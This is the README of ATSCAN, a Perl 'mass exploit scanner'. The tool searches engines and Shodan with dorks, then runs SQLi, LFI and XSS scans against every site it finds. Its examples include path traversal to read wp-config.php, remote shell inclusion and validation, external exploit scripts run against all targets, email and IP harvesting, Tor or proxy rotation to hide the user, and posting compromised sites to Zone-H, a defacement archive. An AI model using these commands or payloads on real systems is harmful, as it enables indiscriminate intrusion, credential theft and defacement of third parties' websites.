https://github.com/alisamtechnology/atscan

Advanced dork Search & Mass Exploit Scanner

data dork engine exploitation lfi linux mass-exploitation-scanner ports portscan rfi scanner security server shell sqli system tools vulnerability-scanners web-application xss

ATSCAN SCANNER

Advanced Mass Search / Dork / Exploitation Scanner



Alisam Technology is not responsible for any misuse, damage caused by this script or attacking targets without prior mutual consent! It is your responsibility to obey laws!


Codename: 4n0n4t

AUTHOR: Ali MEHDIOUI

GROUP: Alisam@Technology


Description:



● Engines: [Google apis cache] Bing Ask Yandex Sogou Exalead Shodan

● Mass Dork Search

● Multiple instant scans.

● Mass Exploitation

● Use proxy.

● Random user agent.

● Random engine.

● Mass external command execution.

● Exploits and issues search.

● XSS / SQLI / LFI / AFD scanner.

● Filter wordpress & Joomla sites.

● Wordpress theme and plugin detection.

● Find Admin page.

● Decode / Encode Base64 / MD5



● Ports scan.

● Collect IPs

● Collect E-mails.

● Auto detect errors.

● Auto detect forms.

● Auto detect Cms.

● Post data.

● Auto sequence repeater.

● Validation.

● Post and Get method

● IP Localisation

● Issues and Exploit search

● Interactive and Normal interface.

● And more...



★ Libraries to install:



Perl required.

Works on all platforms.
Available in BlackArch and Dracos Linux.


Download:



● git clone https://github.com/AlisamTechnology/ATSCAN

● direct link: https://github.com/AlisamTechnology/ATSCAN


Permissions:



cd ATSCAN

chmod +x ./atscan.pl


Installation:


chmod +x ./install.sh
./install.sh


Execution:



Portable Execution: perl ./atscan.pl

Installed Tool Execution: atscan

Menu: Applications > Web Application analysis > atscan


Repair Tool:



atscan --repair



Uninstall Tool:



atscan --uninstall



Commands:




--help / -h
Help.


--proxy

Set tor proxy for scans [EX: --proxy "socks4://localhost:9050"]

Set proxy [EX: --proxy "http://12.45.44.2:8080"]

Set proxy list [EX: --proxy file]


--prandom
Random proxy [EX: --prandom file or --prandom "socks://localhost:9050"]


--motor / -m
bing google ask yandex sogou exalead googleapis googlecache or all


--apikey
Apikey


--cx
Googleapis ID


--mrandom
Random of given engines


--brandom
Random choice among all available user agents


--freq
Random time frequency (in seconds)


--time
Set browser timeout


--dork / -d
Dork to search [Ex: house [OTHER]cars [OTHER]hotel]


--target / -t
Target


--level / -l
Scan level (Number of results pages to scan)


--zone
Search engine country.


--param / -p
Set test parameter EX:id,cat,product_ID


--save / -s
Output.


--source
Html output file


--bugtraq
Search exploits and issues


--content
Print request content


--data
Post and Get forms. See examples


--vshell
Validate by url ex: --HOST/shell.php or file


--post
Use post method


--get
Use get method


--header
Set headers


--fullHeaders
Print full request headers


--host
Domain name [Ex: site.com]


--nobanner
Hide tool banner


--beep
Produce beep sound if positive scan found.


--ifend
Produce beep sound when scan process is finished.


--noverbose
No scan verbose.


--ping
Host ping.


--limit
Limit max positive scan results.


--valid / -v
Validate by string at least 1 is matching


--validAll
Validate all given strings


--status
Validate by http header status


--server
Validate by server


--ifinurl
Get targets with exact string matching


--sregex
Get targets with exact regex matching


--exclude
Get targets where strings do not exist in html


--excludeAll
Get targets where all strings do not exist in html


--unique
Get targets with exact dork matching


--replace
Replace exact string


--replaceFROM
Replace from string to the end of target


--exp / -e
Exploit/Payload will be added to full target


--expHost
Exploit will be added to the host


--expIp
Exploit will be added to the host ip


--xss
Xss scan



--sql
Sqli scan


--lfi
Local file inclusion


--joomrfi
Scan for joomla local file inclusion.


--shell
Shell link [Ex: http://www.site.com/shell.txt]


--wpafd
Scan wordpress sites for arbitrary file download


--admin
Get site admin page


--shost
Get site subdomains


--port
port


--tcp
TCP port


--udp
UDP port


--getlinks
Get target html links


--wp
Wordpress site


--joom
Joomla site


--zip
Get zip files


--md5
Convert to md5


--encode64
Encode base64 string


--decode64
Decode base64 string


--TARGET
Will be replaced by the target in the external command


--HOST
Will be replaced by the host in the external command


--HOSTIP
Will be replaced by the host IP in the external command


--PORT
Will be replaced by the open port in the external command


--ips
Collect IPs


--geoloc
IP geolocation


--regex
Crawl to get strings matching regex


--noquery
Remove string value from Query url [ex: site.com/index.php?id=string]


--command / -c
External command to execute


--popup
Execute external command in a new terminal window


--zoneH
Upload to Zone-H


--saveCookie
Cookies output file


--setCookies
Cookie file


--email
Collect emails


rang(x-y)
EX: --expHost "/index.php?id=rang(1-9)" --sql OR -t "site.com/index.php?id=rang(1-9)" --sql

Expands to site.com/index.php?id=1 through site.com/index.php?id=9.


repeat(txt-y)
EX: --expHost "/index.php?id=repeat(../-9)wp-config.php" --status 200 OR -t "site.com/index.php?id=../wp-config.php"

Requests site.com/index.php?id=../wp-config.php, then site.com/index.php?id=../../wp-config.php, and so on, 9 times.


[OTHER]
To separate values ex: dork1 [OTHER]DORK2 [OTHER]DORK3


--googleapi
Google Apis


--shodan
Shodan search


--count
Search Shodan without Results


--count
Search Shodan


--dnsreverset
Shodan Reverse DNS Lookup


--dnsresolve
Shodan Resolve DNS Lookup


--tokens
String filters and parameters


--querysearch
Search the directory of saved Shodan search queries


--query
List the saved Shodan search queries


--querytags
List the most popular Shodan tags


--myip
List all services that Shodan crawls


--services
List all services that Shodan crawls


--apinfo
My Shodan API Plan Information


--ports
List of port numbers that the crawlers are looking for


--protocols
List all protocols that can be used when performing on-demand Internet scans via Shodan.


--honeyscore
Calculates honeypot score ranging from 0 (not a honeypot) to 1.0 (is a honeypot) in shodan


--facets
Shodan search facets


--update
Update tool


--repair
Repair or force tool update.


--tool / -?
Tool info.


--config
User configuration.


--interactive / -i
Interactive mode interface.


--uninstall
Uninstall Tool.



Examples:




PROXY:

Tor: --proxy [proxy] [Ex: --proxy socks://localhost:9050].

Proxy: --proxy [proxy] Ex: --proxy http://12.32.1.5:8080

or --proxy file Ex: --proxy my_proxies.txt



RANDOM:

Random proxy: --prandom [proxy file]

Random browser: --brandom

Random engine: --mrandom [ENGINES]



SET HEADERS:

atscan --dork [dork / dorks.txt] --level [level] --header "Authorization => 'Basic YWRtaW46YWRtaW4', keep_alive => '1'"

atscan -t target --data "name=>username, email=>xxxxxx, pass=>xxxxx" --post --header "Authorization => 'Basic YWRtaW46YWRtaW4', keep_alive => '1'"



SEARCH ENGINE:

Search: atscan --dork [dork] --level [level]

Search: atscan -d [dork] -l [level] --getlinks

Set engine: atscan --dork [dork] --level [level] -m bing or google,ask,yandex or all

Set selective engines: atscan -d [dork] -l [level] -m google,bing,..

Search with many dorks: atscan --dork dork1 [OTHER]dork2 [OTHER]dork3 --level [level]

Get Server wordpress sites: atscan -t [target] --wp

Search + output: atscan --dork [dorks.txt] --level [level] --save

Search + get emails: atscan -d [dorks.txt] -l [level] --email

Search + get site emails: atscan --dork site:site.com --level [level] --email

Search + get ips: atscan --dork [dork] --level [level] --ips



REGULAR EXPRESSIONS:

Regex use: atscan [--dork [dork] / -t [target]] --level [level] --regex [regex]

IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))

E-mails: '((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9]+@((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})'



REPEATER:

atscan -t site.com/index.php?id=rang(1-10) --sql

atscan -t [target] --expHost "/index.php?id=rang(1-10)" --sql

atscan -t [target] --expHost "/index.php?id=repeat(../-9)wp-config.php"



PORTS

atscan -t [ip] --port [port] [--udp / --tcp]

atscan -t (ip start)-(ip end) --port [port] [--udp / --tcp]

atscan -t [ip] --port (port start)-(port end) [--udp / --tcp] --command "your extern command"



ENCODE / DECODE:

Generate MD5: --md5 [string]

Encode base64: --encode64 [string]

Decode base64: --decode64 [string]



DATA:

Data: atscan -t [target] --data "field1=>value1, field2=>value2, field3=>value3" [--post / --get]

Exploit: --exp/expHost --data "field1=>value1, field2=>value2, field3=>value3" --vshell [shell path] -v [string] / --status [code] [--post / --get / --upload]

Wordlist: --data "field1=>value1, field2=>WORDLIST:" --vshell [shell path] -v [string] / --status [code] [--post / --get]



EXTERNAL COMMANDS:

atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --TARGET"

atscan --dork [dork / dorks.txt] --level [level] --command "file"

atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --HOST"

atscan --dork [dork / dorks.txt] --level [level] --command "nmap -sV -p 21,22,80 --HOSTIP"

atscan -d "index of /lib/scripts/dl-skin.php" -l 2 -m bing --command "php WP-dl-skin.php-exploit.php --TARGET"

atscan --shodan --search [string] --apikey [API KEY] --command [extern_command]



MULTIPLE SCANS:

atscan --dork [dork] --level [10] --sql --lfi --wp ..

atscan --dork [dork] --level [10] --replace [string => new_string] --exp/expHost [payload] [--sql / --lfi / --wp /...]

atscan -t [ip] --level [10] [--sql / --lfi / --wp /...]

atscan -t [target] [--sql / --lfi / --wp /...]



IP LOCALISATION:

atscan -t [ip/target] --geoloc



SEARCH VALIDATION:

atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string/file]

atscan -d [dork / dorks.txt] -l [level] --status [code] / --exclude [string/file]

atscan -d [dork / dorks.txt] -l [level] --ifinurl [string]

atscan -d [dork / dorks.txt] -l [level] --sregex [regex] --valid [string]

atscan -d [dork / dorks.txt] -l [level] --regex [regex] --valid [string]

atscan -d [dork / dorks.txt] -l [level] --unique

atscan -t [target / targets.txt] --status [code] / --valid [string]

atscan -t [target / targets.txt] --vshell [file path]

atscan -d [dork / dorks.txt] -l [level] --exp/expHost [payload] --status [code] / --valid [string]

atscan -d [dorks.txt] -l [level] --replace [string => new_string] --status [code] / --valid [string]

atscan -d [dork / dorks.txt] -l [level] [--admin / --sql ..] --status [code] / --valid [string]

atscan -d [dorks.txt] -l [level] --replaceFROM [string => new_string] --status [code] / --valid [string]

atscan -d [dorks.txt] -l [level] --replace [string => new_string] --exp/expHost [payload] --status [code] / --valid [string]

atscan -d [dork / dorks.txt] -l [level] [--sql / --shost ..] --status [code] / --valid [string]

atscan -t [target / targets.txt] --valid [string] --exclude [string]



ZONE-H:

atscan -t [target / targets.txt] -v [string] --zoneH "notifier => --HOST/index.php"



SEARCH EXPLOITS:

atscan --bugtraq -d [string] -l 1 EX: atscan --bugtraq -d wordpress -l 1

atscan --bugtraq -d file.txt -l 1

atscan --bugtraq -d [string] -l 1 --limit 10



GOOGLEAPIS SEARCH

atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID]

atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] -v [string]

atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] --exp [exploit]

atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] [ANY OPTION]



SHODAN SEARCH

atscan --shodan --target [ip or host or file] --apikey [API KEY]

atscan --shodan --dork [string or file] --apikey [API KEY]

atscan --shodan --dnsresolve [ip or host or file] --apikey [API KEY]

atscan --shodan --dnsrevese [ip or host or file] --apikey [API KEY]

atscan --shodan --count [query or file] --apikey [API KEY]

atscan --shodan --query --apikey [API KEY]

atscan --shodan --querysearch [query or file] --apikey [API KEY]

atscan --shodan --querytags --apikey [API KEY]

atscan --shodan --myip --apikey [API KEY]

atscan --shodan --apinfo --apikey [API KEY]

atscan --shodan --services --apikey [API KEY]

atscan --shodan --ports --apikey [API KEY]

atscan --shodan --tokens [string or file] --apikey [API KEY]



UPDATE TOOL:

atscan --update



UNINSTALL TOOL:

atscan --uninstall


THANKS TO:

BlackArch Linux & Dracos OS developers for incorporating my project in their systems.